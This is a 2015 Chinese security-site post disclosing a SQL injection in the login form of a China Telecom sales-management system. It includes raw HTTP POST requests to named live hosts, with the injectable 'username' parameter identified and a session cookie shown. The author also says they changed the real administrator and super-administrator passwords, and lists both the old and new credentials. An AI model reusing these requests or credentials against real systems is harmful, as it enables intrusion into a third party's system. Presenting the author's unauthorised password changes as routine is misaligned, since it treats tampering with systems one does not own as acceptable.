<% dim ModuleName,InfoID,ChannelShortName,CorrelativeArticle,InstallDir,ChannelDir,Keyword,PageTitle,ArticleIntro,Articlecontent Keyword=stripHTML("中国电信,电信某系统,系统登陆框,SQL注入,注入漏洞") PageTitle=stripHTML("中国电信某系统登陆框SQL注入漏洞") ArticleIntro=stripHTML("中国电信某系统登陆框SQL注入漏洞") Articlecontent=stripHTML("中国电信某系统登陆框SQL注入漏洞  中国电信销售管家系统3.0版存在登录框SQL注入  POST /install/login.php HTTP/1.1  C…") ModuleName = stripHTML("exploits") InfoID = stripHTML("203718") ChannelShortName=stripHTML("漏洞") InstallDir=stripHTML("http://www.77169.org/") ChannelDir=stripHTML("exploits") %> 中国电信某系统登陆框SQL注入漏洞 - 华盟网 - http://www.77169.org
您现在的位置: 华盟网 >> 漏洞 >> 网站漏洞 >> 正文

[组图]中国电信某系统登陆框SQL注入漏洞

2015/6/26 作者:彩儿 来源: 本站整理
导读 <% if len(ArticleIntro)<3 then Response.Write Articlecontent 'Response.Write "Articlecontent" else Response.Write ArticleIntro 'Response.Write "ArticleIntro" end if %>



  中国电信某系统登陆框SQL注入漏洞

  中国电信销售管家系统3.0版存在登录框SQL注入

  POST /install/login.php HTTP/1.1

  Content-Length: 209

  Content-Type: application/x-www-form-urlencoded

  X-Requested-With: XMLHttpRequest

  Referer: http://sdgree.grirms.com:80/

  Cookie: PHPSESSID=edq5psps1jo1fvo13cea7uku05; grirms_grirms_remember_me=ogfdiclb

  Host: sdgree.grirms.com

  Connection: Keep-alive

  Accept-Encoding: gzip,deflate

  User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0

  Mobile/10A5376e Safari/8536.25

  Accept: */*

  auth_code=94102&password=admin&referer=&remember_me=on&username=admin

  参数:username

      
      
     

  登录时提示密码过期,需要更改密码,所以改了管理员的密码原密码:admin/sdgree1234567现密码:admin/Sdgree123原密码:super_admin/sdgree1111111现密码:super_admin/Sdgree123

  其他案例http://bx.grirms.com/

      
 

  POST /install/login.php HTTP/1.1

  Content-Length: 209

  Content-Type: application/x-www-form-urlencoded

  X-Requested-With: XMLHttpRequest

  Referer: http://bx.grirms.com:80/install/login.php

  Host: bx.grirms.com

  Connection: Keep-alive

  Accept-Encoding: gzip,deflate

  User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0

  Mobile/10A5376e Safari/8536.25

  Accept: */*

  auth_code=94102&password=admin&referer=&remember_me=on&username=admin



  • 上一篇漏洞:

  • 下一篇漏洞: 没有了